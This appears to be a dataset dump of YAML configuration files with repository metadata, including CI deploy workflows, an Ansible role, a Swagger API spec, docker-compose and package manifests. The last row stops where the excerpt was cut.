hexsha
stringlengths
40
40
size
int64
5
1.05M
ext
stringclasses
588 values
lang
stringclasses
305 values
max_stars_repo_path
stringlengths
3
363
max_stars_repo_name
stringlengths
5
118
max_stars_repo_head_hexsha
stringlengths
40
40
max_stars_repo_licenses
listlengths
1
10
max_stars_count
float64
1
191k
max_stars_repo_stars_event_min_datetime
stringdate
2015-01-01 00:00:35
2022-03-31 23:43:49
max_stars_repo_stars_event_max_datetime
stringdate
2015-01-01 12:37:38
2022-03-31 23:59:52
max_issues_repo_path
stringlengths
3
363
max_issues_repo_name
stringlengths
5
118
max_issues_repo_head_hexsha
stringlengths
40
40
max_issues_repo_licenses
listlengths
1
10
max_issues_count
float64
1
134k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
3
363
max_forks_repo_name
stringlengths
5
135
max_forks_repo_head_hexsha
stringlengths
40
40
max_forks_repo_licenses
listlengths
1
10
max_forks_count
float64
1
105k
max_forks_repo_forks_event_min_datetime
stringdate
2015-01-01 00:01:02
2022-03-31 23:27:27
max_forks_repo_forks_event_max_datetime
stringdate
2015-01-03 08:55:07
2022-03-31 23:59:24
content
stringlengths
5
1.05M
avg_line_length
float64
1.13
1.04M
max_line_length
int64
1
1.05M
alphanum_fraction
float64
0
1
eb198985cce0930ea5b0d10f7f6f8ae4b5e29e20
1,531
yml
YAML
.github/workflows/deploy.yml
ichengchao/hexoblog
3ac7b8a81bd5975214fb094f1ef1e1c59bd0247f
[ "Apache-2.0" ]
null
null
null
.github/workflows/deploy.yml
ichengchao/hexoblog
3ac7b8a81bd5975214fb094f1ef1e1c59bd0247f
[ "Apache-2.0" ]
null
null
null
.github/workflows/deploy.yml
ichengchao/hexoblog
3ac7b8a81bd5975214fb094f1ef1e1c59bd0247f
[ "Apache-2.0" ]
null
null
null
# deploy hexo blog to aliyun oss name: Deploy Blog # Controls when the action will run. Triggers the workflow on push or pull request # events but only for the master branch on: push: branches: [master] pull_request: branches: [master] # A workflow run is made up of one or more jobs that can run sequentially or in parallel jobs: # This workflow contains a single job called "build" build: # The type of runner that the job will run on runs-on: ubuntu-latest # Steps represent a sequence of tasks that will be executed as part of the job steps: # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it - uses: actions/checkout@v2 - uses: actions/setup-node@v1 with: node-version: "12" # Runs a single command using the runners shell - name: Run a one-line script run: echo Hello, world! - name: Install dependencies run: | npm i -g hexo-cli npm i hexo - name: Run a multi-line script run: | hexo generate ls -l public - name: config ossutil uses: manyuanrong/setup-ossutil@v2.0 with: endpoint: ${{ secrets.ALIYUN_OSS_ENDPOINT }} access-key-id: ${{ secrets.ALIYUN_OSS_KEY_ID }} access-key-secret: ${{ secrets.ALIYUN_OSS_KEY_SECRET }} - name: upload to oss run: | ossutil rm oss://chengchaoblog/ -a -r -f ossutil cp public oss://chengchaoblog -r -f
28.886792
88
0.623775
119bcd39de311ecdd3be7660fab57116501d6f3d
1,291
yaml
YAML
packages/hagraph.yaml
DrJeff/homeassistant-config
b6eee80027dbd11670b6068804208e917e2d3082
[ "MIT" ]
215
2016-06-23T22:56:39.000Z
2022-02-05T19:00:34.000Z
packages/hagraph.yaml
DrJeff/homeassistant-config
b6eee80027dbd11670b6068804208e917e2d3082
[ "MIT" ]
3
2016-09-01T01:03:53.000Z
2019-05-03T08:13:09.000Z
packages/hagraph.yaml
DrJeff/homeassistant-config
b6eee80027dbd11670b6068804208e917e2d3082
[ "MIT" ]
32
2016-08-16T09:55:14.000Z
2021-08-19T11:41:13.000Z
################################################################ ## Packages / HA Graph ################################################################ ################################################ ## Customize ################################################ homeassistant: customize: ################################################ ## Node Anchors ################################################ package.node_anchors: customize: &customize package: 'hagraph' expose: &expose <<: *customize haaska_hidden: false homebridge_hidden: false ################################################ ## Script ################################################ script.generate_graph: <<: *customize friendly_name: "Generate Graph" icon: mdi:vector-polyline ################################################ ## Script ################################################ script: generate_graph: sequence: - service: shell_command.generate_graph ################################################ ## Shell Command ################################################ shell_command: generate_graph: >- python3 -m hagraph -i $HASS_CONFIG/configuration.yaml -o $HASS_CONFIG/www/img/graph.svg
26.346939
91
0.331526
160327ac13c19c4834078b3ceb4661efcd9ea918
7,544
yaml
YAML
swagger.yaml
uk-gov-mirror/ONSdigital.dp-dimension-search-api
ae9ba2ef6205cfe84e2fb906c9f942ae8347408e
[ "MIT" ]
null
null
null
swagger.yaml
uk-gov-mirror/ONSdigital.dp-dimension-search-api
ae9ba2ef6205cfe84e2fb906c9f942ae8347408e
[ "MIT" ]
null
null
null
swagger.yaml
uk-gov-mirror/ONSdigital.dp-dimension-search-api
ae9ba2ef6205cfe84e2fb906c9f942ae8347408e
[ "MIT" ]
2
2021-04-11T07:46:32.000Z
2021-12-31T18:39:44.000Z
swagger: "2.0" info: description: "Used to search for possible options for a dimension within a published dataset. Only certain dimensions, which can be represented as hierarchies, will be searchable." version: "1.0.0" title: "Search within a dataset" license: name: "Open Government Licence v3.0" url: "http://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/" basePath: "/v1" tags: - name: "Public" - name: "Private user" schemes: - "http" parameters: dimension_name: name: name description: "A dimension from a dataset." in: path required: true type: string edition: name: edition description: "An edition of a dataset" in: path required: true type: string id: name: id description: "Id that represents a dataset" in: path required: true type: string instance_id: name: instance_id description: "A unique id for an instance." in: path required: true type: string limit: name: limit description: "The number of items requested, defaulted to 50 and limited to 1000." in: query type: integer offset: name: offset description: "The first row of resources to retrieve, starting at 0. Use this parameter as a pagination mechanism along with the limit parameter." in: query type: integer query: name: q description: "The query text to search datasets with." in: query type: string required: true version: name: version description: "A version of a dataset" in: path required: true type: string securityDefinitions: FlorenceAPIKey: name: florence-token description: "API key used to allow florence users to be able to preview the dimension search for an unpublished version." in: header type: apiKey paths: /dimension-search/datasets/{id}/editions/{edition}/versions/{version}/dimensions/{name}: get: tags: - "Public" summary: "Search for an option within a hierarchical dimension" description: "Perform a search on dimension options which are within a hierarchy of a published version of a dataset by the ONS." parameters: - $ref: '#/parameters/id' - $ref: '#/parameters/edition' - $ref: '#/parameters/version' - $ref: '#/parameters/dimension_name' - $ref: '#/parameters/limit' - $ref: '#/parameters/offset' - $ref: '#/parameters/query' produces: - "application/json" responses: 200: description: "A json list containing search results of dimension options which are within a hierarchy of a published version of a dataset by the ONS." schema: $ref: '#/definitions/Dimension_Options' 400: $ref: '#/responses/InvalidRequestError' 404: $ref: '#/responses/NotFoundError' 500: $ref: '#/responses/InternalError' /dimension-search/instances/{instance_id}/dimensions/{name}: put: tags: - "Private user" summary: "Create a search index" description: "Create a search index containing a list of dimension options for an instance" parameters: - $ref: '#/parameters/instance_id' - $ref: '#/parameters/dimension_name' responses: 200: description: "The index was created" 404: $ref: '#/responses/NotFoundError' 500: $ref: '#/responses/InternalError' delete: tags: - "Private user" summary: "Delete a search index" description: "Remove a search index containing a list of dimension options for an instance" parameters: - $ref: '#/parameters/instance_id' - $ref: '#/parameters/dimension_name' responses: 200: description: "The index was removed" 404: description: "The index was not found" 500: $ref: '#/responses/InternalError' responses: MethodNotDefinedError: description: "Method for existing path does not exist." InvalidRequestError: description: "Failed to process the request due to invalid request." InternalError: description: "Failed to process the request due to an internal error." NotFoundError: description: "Dimension or option not found." definitions: Dimension_Options: description: "The resulting resource of the completed search against a dimension hierarchy." type: object required: ["count","limit", "items", "offset", "total_count"] properties: count: description: "The number of items returned." type: integer items: description: "The results of the completed search against a dimension hierarchy." type: array items: $ref: '#/definitions/HierarchyDimensionOptionResponse' limit: description: "The number of items requested, defaulted to 50 and limited to 1000." type: integer offset: description: "The first row of items to retrieve, starting at 0. Use this parameter as a pagination mechanism along with the limit parameter. The total number of items that one can page through is limited to 1000 items." type: integer HierarchyDimensionOptionResponse: description: "An individual result of the completed search of dimension hierarchy." type: object required: ["code", "dimension_option_url", "has_data", "label", "matches", "number_of_children"] properties: code: type: string description: "The code for this dimension option." dimension_option_url: type: string description: "The id of a collection of datasets that a dataset is associated to." has_data: type: boolean description: "Indicator to show whether there is an observation value corresponding to the dimension option." label: type: string description: "The label for this dimension option." matches: $ref: '#/definitions/Matches' number_of_children: type: integer description: "The number of first generation descendents to this dimension option within the hierarchy." Matches: description: "A list of members and arrays of character offset, defining substrings that matched the search terms." type: object properties: code: description: "An array of character offset into the `code` string. These always occur in pairs, and define the start and end of substrings in the member `code` that matched the search terms. The first character of the string is index 1. " type: array items: $ref: '#/definitions/Snippet' label: description: "An array of character offsets into the `label` string. These always occur in pairs, and define the start and end of substrings in the member `label` that matched the search terms. The first character of the string is index 1." type: array items: $ref: '#/definitions/Snippet' Snippet: description: "A pair of integers to define the start and end of substring in the member that matched the search terms. The first character of the string is index 1." type: object properties: start: type: integer description: "An integer to define the start of a substring in the member that matched. The first character of the string is index 1." example: 3 end: type: integer description: "An integer to define the end of a substring in the member that matched." example: 8
36.8
248
0.665164
7a4c7ae336496c781d12906e55d21c5e7de4e066
157
yaml
YAML
tools/upload_to_s3/config.yaml
briankosw/hydra
836687d59517de0e9aba27bb230bc1eb16f0098c
[ "MIT" ]
1
2021-09-06T09:27:28.000Z
2021-09-06T09:27:28.000Z
tools/upload_to_s3/config.yaml
paantya/hydra
599205ffa771045429a6a32ef69a464602d31e15
[ "MIT" ]
7
2021-06-28T20:41:38.000Z
2022-02-27T11:23:34.000Z
tools/upload_to_s3/config.yaml
paantya/hydra
599205ffa771045429a6a32ef69a464602d31e15
[ "MIT" ]
null
null
null
aws_config_profile: "default" bucket_name: "hydra-test-us-west-2" local_file_path: "" # The name in S3, leave blank to not rename the file. s3_file_name: ""
26.166667
53
0.751592
d8198bc7b02604587d2f70434d033411f0faf899
504
yml
YAML
.kitchen.yml
pingworks/chef-pw_dnsmasq
d90d710df1e47d734c32e191f617af1f98c7d11d
[ "Apache-2.0" ]
null
null
null
.kitchen.yml
pingworks/chef-pw_dnsmasq
d90d710df1e47d734c32e191f617af1f98c7d11d
[ "Apache-2.0" ]
null
null
null
.kitchen.yml
pingworks/chef-pw_dnsmasq
d90d710df1e47d734c32e191f617af1f98c7d11d
[ "Apache-2.0" ]
null
null
null
--- driver: name: vagrant provisioner: name: chef_zero require_chef_omnibus: 12.4.1 platforms: - name: ubuntu-14.04 driver: box: trusty-server-cloudimg-amd64-vagrant-disk1 box_url: https://cloud-images.ubuntu.com/vagrant/trusty/current/trusty-server-cloudimg-amd64-vagrant-disk1.box suites: - name: default run_list: - recipe[pw_dnsmasq::default] attributes: pw_dnsmasq: interface: 'eth0' gw_ip: '10.0.2.15' rubygems_mirror_ip: ''
21
116
0.666667
d67db496074e3ada8353c9d9ec676f7c8b9135e6
382
yml
YAML
Docker/Portainer/docker-compose.yml
stylepatrick/smartHome
270b79731cae590f49515b6b9736bfc2fb9c7114
[ "MIT" ]
1
2020-01-06T10:40:49.000Z
2020-01-06T10:40:49.000Z
Docker/Portainer/docker-compose.yml
stylepatrick/smartHome
270b79731cae590f49515b6b9736bfc2fb9c7114
[ "MIT" ]
null
null
null
Docker/Portainer/docker-compose.yml
stylepatrick/smartHome
270b79731cae590f49515b6b9736bfc2fb9c7114
[ "MIT" ]
null
null
null
version: '3.3' services: portainer: container_name: portainer ports: - '9000:9000' restart: always volumes: - '/var/run/docker.sock:/var/run/docker.sock' - 'portainer-data:/data' image: portainer/portainer logging: driver: "json-file" options: max-size: "10m" max-file: "10" volumes: portainer-data:
18.190476
53
0.578534
3bce92e47e80afe0157b710cf14dd352cd6cba91
1,879
yml
YAML
ansible/main/roles/deploy-ibis/tasks/main.yml
ecohealthalliance/infrastructure
988e362c453e6009ad1cc6cdfbe41f5af92e2878
[ "Apache-2.0" ]
1
2019-05-26T13:34:53.000Z
2019-05-26T13:34:53.000Z
ansible/main/roles/deploy-ibis/tasks/main.yml
ecohealthalliance/infrastructure
988e362c453e6009ad1cc6cdfbe41f5af92e2878
[ "Apache-2.0" ]
13
2016-04-05T20:39:01.000Z
2021-01-28T22:13:25.000Z
ansible/main/roles/deploy-ibis/tasks/main.yml
ecohealthalliance/infrastructure
988e362c453e6009ad1cc6cdfbe41f5af92e2878
[ "Apache-2.0" ]
3
2016-06-20T13:33:38.000Z
2021-04-18T08:52:47.000Z
- name: Download ibis image aws_s3: bucket: bsve-integration object: ibis.tar.gz dest: /tmp/ibis.tar.gz mode: get overwrite: "{{overwrite}}" register: ibisimage - when: ibisimage.changed block: - command: "gzip -dfk /tmp/ibis.tar.gz" - name: Load image into docker shell: "docker load < /tmp/ibis.tar" - name: Copy image from github git: repo: "https://github.com/ecohealthalliance/ibis.git" dest: "/ibis" recursive: no force: yes - name: Download GPW data command: aws s3 cp s3://eha-flirt/gpw-v4-population-count-rev10_2015_15_min_tif.zip /ibis/.scripts - name: Install unzip apt: pkg=unzip state=installed - command: unzip -o gpw-v4-population-count-rev10_2015_15_min_tif.zip -d score_api/gpw args: creates: /ibis/.scripts/score_api/gpw chdir: /ibis/.scripts - name: Build IBIS score api image command: "docker build -t ibis-score-api /ibis/.scripts/score_api" - file: path="/shared/ibis" state=directory - name: Create sensitive-environment-vars.env copy: content="{{ ibis_sensitive_envvars }}" dest="/shared/ibis/sensitive-environment-vars.env" force=yes - name: Create meteor settings.json copy: content: "{{ ibis_settings | to_json }}" dest: "/shared/ibis/settings-production.json" force: yes vars: ibis_settings: public: analyticsSettings: "Google Analytics": trackingId": "UA-54918272-10" private: initial_user: profile: name: "Admin" email: "{{ ibis_admin_email }}" - name: Copy compose directory synchronize: src="compose/" dest="/ibis-compose" - name: Start ibis services docker_service: project_src: /ibis-compose environment: ip_address: "{{ ansible_default_ipv4.address }}" aws_smtp_user: "{{ aws_smtp_user }}" aws_smtp_password: "{{ aws_smtp_password }}"
26.842857
107
0.672166
fa778afb131c549148c429bd842c7bdbaf0b9e3c
88
yml
YAML
environment.yml
VitorMartin/pokedex
6475f1f42b18ecda970fd20ce94a4bfbcaa733de
[ "MIT" ]
null
null
null
environment.yml
VitorMartin/pokedex
6475f1f42b18ecda970fd20ce94a4bfbcaa733de
[ "MIT" ]
null
null
null
environment.yml
VitorMartin/pokedex
6475f1f42b18ecda970fd20ce94a4bfbcaa733de
[ "MIT" ]
null
null
null
name: pokedex dependencies: - python=3.4.0 - pip - pytest - typing - requests
11
16
0.625
75e653aac72d919a5d49f21971d3799a1fdbee1b
1,482
yml
YAML
roles/haste-server/tasks/main.yml
lathan/rhel-lab
90586a8a0459ab5a30d6f2b7105fa2588c241d6a
[ "Unlicense" ]
null
null
null
roles/haste-server/tasks/main.yml
lathan/rhel-lab
90586a8a0459ab5a30d6f2b7105fa2588c241d6a
[ "Unlicense" ]
null
null
null
roles/haste-server/tasks/main.yml
lathan/rhel-lab
90586a8a0459ab5a30d6f2b7105fa2588c241d6a
[ "Unlicense" ]
null
null
null
--- # dependencies - name: install redis, nodejs, npm yum: name={{ item }} state=present with_items: - redis - nodejs - npm - git # redis # - name: enable overcommit_memory for redis sysctl: name=vm.overcommit_memory value=1 state=present tags: sysctl - name: increase sysctls for tcp backlog sysctl: name={{ item }} value=512 state=present with_items: - net.core.somaxconn - net.ipv4.tcp_max_syn_backlog tags: sysctl - name: enable redis server service: name=redis enabled=yes state=started # haste-server # # Clones the repo and doesn't pull if it is # already cloned. - name: get latest haste-server from GitHub git: repo=https://github.com/seejohnrun/haste-server dest=/opt/haste-server/ update=no tags: git # add systemd service - name: systemd service file present copy: src=haste-server.service dest=/etc/systemd/system/haste-server.service # Does 'npm install' only the first time - name: make sure we have done 'npm install' command: npm install args: chdir: /opt/haste-server creates: /opt/haste-server/node_modules - name: configuration for haste-server copy: src=config.js dest=/opt/haste-server/config.js notify: restart haste-server - name: allow http (80/tcp) in firewalld firewalld: service=http permanent=true state=enabled notify: reload firewalld - name: start and enable haste-server service: name=haste-server enabled=yes state=started
23.903226
57
0.704453
5f919e007274d3e13478c73597cf3a3ed6716cd7
538
yaml
YAML
.github/workflows/ci.yaml
psshehzin/container-postgresql
257271551884071476cb5ab65c8ac1c92a517f85
[ "Apache-2.0" ]
null
null
null
.github/workflows/ci.yaml
psshehzin/container-postgresql
257271551884071476cb5ab65c8ac1c92a517f85
[ "Apache-2.0" ]
null
null
null
.github/workflows/ci.yaml
psshehzin/container-postgresql
257271551884071476cb5ab65c8ac1c92a517f85
[ "Apache-2.0" ]
null
null
null
name: CI on: push: pull_request: schedule: - cron: '0 0 * * 0' jobs: ci: runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 - name: Set up registry credentials if: ${{ github.ref == 'refs/heads/master' && github.repository_owner == 'ManageIQ' }} run: | echo "REGISTRY_USERNAME=${{ secrets.REGISTRY_USERNAME }}" >> $GITHUB_ENV echo "REGISTRY_PASSWORD=${{ secrets.REGISTRY_PASSWORD }}" >> $GITHUB_ENV - name: Run container build script run: bin/build_container_image
25.619048
91
0.63197
5fa46a586f8ab1905d825d7e6d3bffe5029ca42e
2,139
yml
YAML
.github/workflows/deploy.yml
yskszk63/cancel-workflow-run
35d23fc8e0f3a744b0a6fd540c35bd918e2dd064
[ "MIT" ]
null
null
null
.github/workflows/deploy.yml
yskszk63/cancel-workflow-run
35d23fc8e0f3a744b0a6fd540c35bd918e2dd064
[ "MIT" ]
null
null
null
.github/workflows/deploy.yml
yskszk63/cancel-workflow-run
35d23fc8e0f3a744b0a6fd540c35bd918e2dd064
[ "MIT" ]
null
null
null
name: deploy on: push: paths-ignore: - "README.md" - "LICENSE" - "azuredeploy.*" - "assets/**" jobs: check: runs-on: "ubuntu-latest" steps: - uses: actions/checkout@v2 - uses: actions/setup-go@v2 with: go-version: '^1.16.3' - name: Test run: go test -race -coverprofile="coverage.txt" -covermode=atomic - name: Upload coverage uses: codecov/codecov-action@v1 package: runs-on: "ubuntu-latest" steps: - uses: actions/checkout@v2 - uses: actions/setup-go@v2 with: go-version: '^1.16.3' - name: Package run: make package.zip - name: Push PreRelease uses: "marvinpinto/action-automatic-releases@latest" with: repo_token: "${{ secrets.GITHUB_TOKEN }}" automatic_release_tag: "nightly" prerelease: true title: "Development Build" files: package.zip - name: Archive package uses: actions/upload-artifact@v2 with: name: package path: package.zip test-deploy: needs: package environment: Test runs-on: "ubuntu-latest" steps: - name: Sync trigger run: curl -sSf -HContent-Length:0 -XPOST "https://$APP_NAME.azurewebsites.net/admin/host/synctriggers?code=$API_KEY" env: APP_NAME: ${{ secrets.AZURE_FUNCTION_NAME }} API_KEY: ${{ secrets.AZURE_FUNCTION_API_KEY }} release: needs: - package - check runs-on: "ubuntu-latest" if: startsWith(github.ref, 'refs/tags/v') steps: - name: Download Archive from package job uses: actions/download-artifact@v2 with: name: package - name: Push Release uses: "marvinpinto/action-automatic-releases@latest" with: repo_token: "${{ secrets.GITHUB_TOKEN }}" prerelease: false files: package.zip - name: Push Release Latest uses: "marvinpinto/action-automatic-releases@latest" with: repo_token: "${{ secrets.GITHUB_TOKEN }}" automatic_release_tag: latest prerelease: false files: package.zip # vim:set ts=2 sw=2 sts=2:
25.771084
122
0.608228
be87e2285aa87d9ecb87deb8f1dec2e6bcc22995
7,104
yml
YAML
policies/policies/romeo_641.yml
transpose-publishing/policies-database
d641c6accf35afeda12e74e2a4ab3accc18e09dd
[ "CC0-1.0" ]
18
2018-05-08T19:48:37.000Z
2022-01-17T18:40:42.000Z
policies/policies/romeo_641.yml
transpose-publishing/policies-database
d641c6accf35afeda12e74e2a4ab3accc18e09dd
[ "CC0-1.0" ]
23
2018-04-27T14:05:03.000Z
2018-12-10T10:57:16.000Z
policies/policies/romeo_641.yml
transpose-publishing/policies-database
d641c6accf35afeda12e74e2a4ab3accc18e09dd
[ "CC0-1.0" ]
13
2018-05-02T00:26:31.000Z
2018-06-21T19:42:26.000Z
# ### ROMEO INFORMATION ### # Policy ID from SHERPA/RoMEO (with `romeo_` preprended). Do not edit policy-id: romeo_641 # Publisher name from SHERAP/RoMEO. Do not edit publisher: Universitätsverlag Potsdam # Policy heading from SHERAP/RoMEO. Do not edit policy-heading: '[Default policy]' # A list of the journals from SHERPA/RoMEO associated with this romeo policy. Do not edit journals: - Beiträge zur Lehrerbildung - Brandenburgische Beiträge zur Hochschuldidaktik - Brandenburgische Umweltberichte - DIGAREC Series - Finanzwissenschaftliche Diskussionsbeiträge / Lehrstuhl für Finanzwissenschaft - Forschungspapiere Regierungsorganisation in Westeuropa - 'Geographische Revue: Zeitschrift für Literatur und Diskussion' - 'Horizonte 21: Umwelt - Energie - Sicherheit' - Interdisciplinary Studies on Information Structure - Jahresbericht / Menschenrechtszentrum der Universität Potsdam - KWI Schriften - KWI-Arbeitshefte - KWI-Gutachten - KWI-Info - 'Kentron: Journal zur Lehrerbildung' - LLF-Berichte - Lehr- und Forschungsberichte, Lehrstuhl für Betriebswirtschaftslehre Schwerpunkt Marketing - Linguistics in Potsdam - Mathematische Statistik und Wahrscheinlichkeitstheorie - MenschenRechtsMagazin - Militär und Gesellschaft in der frühen Neuzeit - Mobilisierte Kulturen - NLD Preprints - PaRDeS - Perspektiven historischen Denkens und Lernens - 'Postprints der Universität Potsdam: Humanwissenschaftliche Reihe' - 'Postprints der Universität Potsdam: Mathematisch-Naturwissenschaftliche Reihe' - 'Postprints der Universität Potsdam: Philosophische Reihe' - 'Postprints der Universität Potsdam: Wirtschafts- und Sozialwissenschaftliche Reihe' - Potsdam Cognitive Science Series - Potsdamer Beiträge zur Hochschulforschung - Potsdamer Beiträge zur Lehrevaluation - Potsdamer Beiträge zur Sorabistik - Potsdamer Beiträge zur Sozialforschung - Potsdamer Diskussionspapiere zur Verwaltungswissenschaft - Potsdamer Geographische Forschungen - Potsdamer Lateintage - Potsdamer Schriften zu Statistik und Wirtschaft - Potsdamer Schriften zur Raumwirtschaft - Potsdamer Schriftenreihe zur Musikpädagogik - Potsdamer Studien zu Staat, Recht und Politik - 'Potsdamer Studien zur Frauen- und Geschlechterforschung: Neue Folge' - Potsdamer Studien zur Grundschulforschung - 'Potsdamer Studientexte: Sonderpädagogik' - Praxis Kultur- und Sozialgeographie - Preprints des Instituts für Mathematik der Universität Potsdam - Pri ha-Pardes - Schriften zum deutschen und russischen Strafrecht - Schriftenreihe für Public und Nonprofit Management - Schriftenreihe zur Modernisierung der Landesverwaltung in Brandenburg - Spektrum Patholinguistik - Spektrum Patholinguistik - Schriften - Statistische Diskussionsbeiträge / Lehrstuhl für Statistik und Ökonometrie - Studien zu Grund- und Menschenrechten - Technische Berichte des Hasso-Plattner-Instituts für Softwaresystemtechnik der Universität Potsdam - VJS-Nachrichten - Vortragsreihe / Lehrstuhl für Betriebswirtschaftslehre Schwerpunkt Marketing - WeltTrends - WeltTrends Papiere - WeltTrends Thesis # A list of the journals from SHERPA/RoMEO associated with this policy's child policies. Do not edit child-journals: [] # A list of the Policy IDs from SHERPA/RoMEO that are the parent of this policy. Do not edit parent-policies: [] # A list of the Policy IDs from SHERPA/RoMEO that list this Policy ID as its parent. Do not edit child-policies: [] # Leave any notes about upstream RoMEO issues here. For example, if this policy does not apply to the journals listed above, leave a note here. flag-romeo: # ### OPEN PEER REVIEW ### # Open peer review policy url (valid url) peer-review-url: # Does the journal publish the content of peer reviews? (mandatory/optional/no/not specified) open-reports: # Are reviewer identities revealed to the author? (mandatory/optional/no/not specified) identities-revealed: # Are reviewer identities published? (mandatory/optional/no/not specified) identities-published: # ### CO-REVIEWERS ### # Co-reviewer policy url (valid url) co-review-url: # Journal’s policy about co-reviewers - ie people who collaborate with an invited reviewer (free text) co-review-policy: # Does the journal make it clear in the reviewer invitation email that co-reviewers can contribute? (yes/no) co-review-invited: # ### PEER REVIEW TRANSFER ### # Peer review transfer url (valid url) transfer-url: # Policy on transfer of peer reviews (free text) transfer-policy: # ### REVIEW FORM ### # url to a copy or description of the peer review form (valid url) review-form-url: # What are the titles of the sections of the review form? (free text) review-structure: # Are there separate fields for technical & impact evaluation? (yes/no) separate-structure: # Is there a dedicated place in the submission form to identify co-reviewers? (yes/no) co-review-field: # ### PEER REVIEW CREDIT ### # Peer review credit policy url (valid url) credit-url: # Does the journal deposit peer review information into ORCiD? 'via service' includes Publons (directly/via service/no) orcid-peer-review: # ### PREPRINTS ### # Can users archive preprints (can/cannot/restricted/unclear)? From SHERPA/RoMEO; do not edit. prearchiving: can # Preprint restrictions (from SHERPA/RoMEO: prerestrictions, do not edit) prerestrictions: [] # Copyright policy url (from SHERPA/RoMEO: copyrightlinkurl, do not edit) copyright-urls: - http://www.ub.uni-potsdam.de/publika/oa_carrierpolicy.html # Conditions (from SHERPA/RoMEO: conditions, do not edit) conditions: [] # Preprint policy url (valid url) preprint-url: # Version of the preprint that can be posted to a server (before review only/any/other/none/not specified) preprint-version: # Time when a preprint can be posted (before acceptance only/anytime/other/not specified) preprint-time: # Acceptable servers or characteristics of servers - eg specific names, non-commercial, recognized, etc (free text) acceptable-servers: # preprint-citation-url: Preprint citation policy url (valid url) preprint-citation-url: # Can preprints be cited in the reference list? (yes/no/not specified) preprint-citation: # Preprint media coverage policy url (valid url) preprint-media-url: # What type of coverage or discussion of preprints is allowed, eg in the media or in scientific blogs? (free text) preprint-media: # Preprint licensing policy url (valid url) preprint-licensing-url: # Policies on preprint licensing (free text) preprint-licensing: # Scoop protection policy url (valid url) scoop-protection-url: # Policy on whether submitted preprints will not be rejected if a competing work comes out in another journal after the date of preprinting (free text) scoop-protection: # Community review policy url (valid url) community-reviews-url: # Policy on incorporating community reviews or comments on preprints into editorial assessment (free text) community-reviews: # ### COMMENTS ### # Please leave any comments about the information presented here. comments:
35.878788
151
0.778435
e8e71931e0ccab4ada1bc07774718e040fb95bf8
1,174
yaml
YAML
package.yaml
minad/safe-convert
a56e53236a2a0326abee46aca55ec6d0e3cf4386
[ "MIT" ]
1
2019-11-27T06:58:05.000Z
2019-11-27T06:58:05.000Z
package.yaml
minad/safe-convert
a56e53236a2a0326abee46aca55ec6d0e3cf4386
[ "MIT" ]
null
null
null
package.yaml
minad/safe-convert
a56e53236a2a0326abee46aca55ec6d0e3cf4386
[ "MIT" ]
null
null
null
name: safe-convert version: 0.1.0.0 synopsis: Safe type conversion description: This package provides the Safe.Convert class for safe conversions. While not being the best idea for type inference, you get the additional guarantee of safety. If there is a Safe.Convert instance - you are safe and the conversion is lossless (in contrast to functions like fromIntegral). In particular, this package provides string conversion and safe UTF-8 string decoding. license: MIT author: Daniel Mendler maintainer: mail@daniel-mendler.de category: Data, Conversion github: minad/convert tested-with: GHC == 7.10.1, GHC == 8.0.1 dependencies: - base >= 4.8 && < 5 - bytestring >= 0.9 && < 0.11 - text >= 1.2 && < 1.3 - utf8-string >= 1.0 && < 1.1 when: - condition: impl(ghc < 8.0) dependencies: semigroups >= 0.9 && < 1 library: ghc-options: -Wall source-dirs: - src tests: test: main: test.hs ghc-options: -Wall source-dirs: - test dependencies: - quickcheck-instances - quickcheck-special - safe-convert - tasty - tasty-auto - tasty-quickcheck - ieee754
22.150943
59
0.655026
ce33380d3efce22b38efa11661f0c1c291251d19
209
yaml
YAML
.ansible/roles/agent/templates/agent.yaml
aiananas/adanos-alert
c229084d69bc9bf162b0a6c441e8d6b79e958c4c
[ "MIT" ]
6
2020-05-31T16:28:16.000Z
2022-02-22T01:56:32.000Z
.ansible/roles/agent/templates/agent.yaml
aiananas/adanos-alert
c229084d69bc9bf162b0a6c441e8d6b79e958c4c
[ "MIT" ]
20
2020-08-21T07:20:32.000Z
2022-02-26T16:13:29.000Z
.ansible/roles/agent/templates/agent.yaml
aiananas/adanos-alert
c229084d69bc9bf162b0a6c441e8d6b79e958c4c
[ "MIT" ]
5
2020-12-05T07:06:56.000Z
2022-01-23T11:27:47.000Z
server_addr: "{{ adanos_agent_server_addr }}" server_token: "{{ adanos_agent_server_token }}" data_dir: "{{ adanos_agent_data_dir }}" listen: "{{ adanos_agent_listen }}" log_path: "{{ adanos_agent_logpath }}"
34.833333
47
0.736842
6049995f253c102125446ab88ce1525ed77cab19
624
yml
YAML
cms/modules/wechat/config/install/field.field.wechat_request_message.voice.field_voice.yml
wow-yorick/suffix-zx
1373aad40e8a33b4fd86f2e20cc3e1cd2adaa689
[ "MIT" ]
9
2017-11-23T11:14:16.000Z
2020-08-18T06:19:34.000Z
cms/modules/wechat/config/install/field.field.wechat_request_message.voice.field_voice.yml
wow-yorick/suffix-zx
1373aad40e8a33b4fd86f2e20cc3e1cd2adaa689
[ "MIT" ]
null
null
null
cms/modules/wechat/config/install/field.field.wechat_request_message.voice.field_voice.yml
wow-yorick/suffix-zx
1373aad40e8a33b4fd86f2e20cc3e1cd2adaa689
[ "MIT" ]
1
2017-11-06T04:02:22.000Z
2017-11-06T04:02:22.000Z
langcode: en status: true dependencies: config: - field.storage.wechat_request_message.field_voice - wechat.request_message_type.voice module: - file id: wechat_request_message.voice.field_voice field_name: field_voice entity_type: wechat_request_message bundle: voice label: Voice description: '' required: false translatable: false default_value: { } default_value_callback: '' settings: file_directory: 'wechat/request/voices/[date:custom:Y]-[date:custom:m]' file_extensions: 'amr mp3' max_filesize: '' description_field: false handler: 'default:file' handler_settings: { } field_type: file
23.111111
73
0.770833
8829f1d28f411f979e4af94bb4ed32d324479503
446
yml
YAML
roles/stig/tasks/sshd-hostbasedauthentication-off.yml
Linuxfabrik/lfops
93c2187bb7e695556529269dda93fc28d28d1932
[ "Unlicense" ]
4
2022-03-21T08:50:34.000Z
2022-03-31T07:27:31.000Z
roles/stig/tasks/sshd-hostbasedauthentication-off.yml
Linuxfabrik/lfops
93c2187bb7e695556529269dda93fc28d28d1932
[ "Unlicense" ]
5
2022-03-23T10:31:18.000Z
2022-03-31T12:08:50.000Z
roles/stig/tasks/sshd-hostbasedauthentication-off.yml
Linuxfabrik/lfops
93c2187bb7e695556529269dda93fc28d28d1932
